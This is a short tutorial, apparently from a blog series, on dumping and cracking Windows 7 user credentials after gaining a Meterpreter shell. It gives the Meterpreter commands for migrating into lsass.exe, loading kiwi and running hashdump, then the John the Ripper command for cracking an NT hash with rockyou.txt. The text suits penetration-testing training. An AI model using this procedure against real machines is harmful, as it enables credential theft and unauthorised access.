Dumping Credentials of victim’s windows_7 machine…

In the previous article I have demonstrated you how to do privilege escalation on windows machine…I have promised you to demonstrate you post exploitation on windows machine…I will demonstrate you how to dump and crack the victim’s user credentials on windows machine….

If you don’t know how to get meterpreter shell of victim machine checkout my previous article on how to get meterpreter shell of target windows machine…

Also If you don’t know how to do privilege escalation of the victim machine check out my previous article in which I demonstrated to you how to do privilege Escalation on the target machine…

Now, After getting a full-fledged meterpreter shell of the victim’s machine.

Run getsystem command to cross check weather it escalarated the privilege or not…

getsystem

to check the processes which the victim’s machine is running at that movement the command is

ps

After executing this command you will see the whole bunch of processes that the system is running..

To check your current process Id…

getpid

To harvest the credentials I have to migrate to the of process ID 452 which is lsass.exe….

Let me clear you in short Local Security Authority Subsystem Service (Lsass.exe) is the process on an Active Directory domain controller….It’s responsible for providing Active Directory database lookups, authentication, and replication….

To migrate from the current process which is fnTAZizrHE PID=1912 to lsass.exe PID=452…..the command is are as follows

migrate 452

After migrating to lsass.exe load Kiwi framework to harvest the credentials. for this the command is…

load kiwi

To see the credentials you have to dump the hash key which is saved on the victim’s machine. The command is…..

hashdump

In short, Hashing is the process of transforming any given key or a string of characters into another value…This mechanism secure the credentials…That it….

For this article, I will be cracking the hash of User:Shadab…The last hash after the : specify the password so I will copy the hash to a test file…

To save the hash into a file the command is

echo 7a2199…………….5f > victim.txt

Now the hash is saved into the victim.txt file…Now I will use John-The-Ripper a password cracking tool…

Make sure you have unzipped the rockyou.txt.gz file which is in /usr/share/wordlists/ to unzip it…the command is…

gunzip /usr/share/wordlists/rockyou.txt.gz

For extracting the hashing password….the command is….

john — format=NT victim.txt — wordlist=/usr/share/wordlists/rockyou.txt

successfully cracked the password of user Shadab

Successfully I have dumped the passwords of victim’s machine…

Hacking is illegal…practice this is your lab environment..

In this short article, I have tried to demonstrate you how to dump the password of the victim’s window machine using metasploit framework, kiwi framework, John-the-ripper tool…also how to take shell and privilege escalate the machine for post exploitation….I will be coving next how to do persistence on victim’s window_7 machine….

Thank you for Reading!!